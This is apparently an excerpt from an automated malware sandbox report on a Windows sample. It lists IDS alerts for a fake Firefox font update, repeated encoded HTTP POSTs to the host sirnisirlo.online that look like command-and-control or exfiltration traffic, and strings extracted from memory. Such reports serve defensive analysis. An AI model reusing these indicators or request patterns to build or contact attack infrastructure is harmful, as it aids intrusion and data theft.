                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49264 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49251 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49263 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49258 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49267 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49265 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 96Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 53Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 208Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 139141Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 745Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 212Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 380Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 39217Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 120526Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 35Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 96Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 53Host: sirnisirlo.online
                  Source: global trafficHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0UvgContent-Length: 35Host: sirnisirlo.online
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: 04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1email.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06www.google.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3login.yahoo.com39:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:293e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:71e9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:47login.skype.com92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43addons.mozilla.orgb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0login.live.comd8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0global trustee05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56*.google.com0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4cDigiNotar Root CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Services CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services 1024 CA0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Root CA G2a4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21CertiID Enterprise Certificate Authority5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41DigiNotar Qualified CA46:9c:2c:b007:27:10:0dDigiNotar Cyber CA07:27:0f:f907:27:10:0301:31:69:b0DigiNotar PKIoverheid CA Overheid en Bedrijven01:31:34:bfDigiNotar PKIoverheid CA Organisatie - G2d6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar Extended Validation CA1e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Public CA 202546:9c:2c:af46:9c:3c:c907:27:14:a9Digisign Server ID (Enrich)4c:0e:63:6aDigisign Server ID - (Enrich)72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0UTN-USERFirst-Hardware41MD5 Collisions Inc. (http://www.phreedom.org/md5)08:27*.EGO.GOV.TR08:64e-islem.kktcmerkezbankasi.org03:1d:a7AC DG Tr equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: sirnisirlo.online
                  Source: unknownHTTP traffic detected: POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 96Host: sirnisirlo.online
                  Source: ActiveISO.exe, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://bugreports.qt.io/
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://bugreports.qt.io/_q_receiveReplyMicrosoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogi
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://lsoft.net/act/activate.aspx?ID=%1
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::Networ
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRep
                  Source: ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3
                  Source: ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNe
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                  Source: ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                  Source: cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                  Source: ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
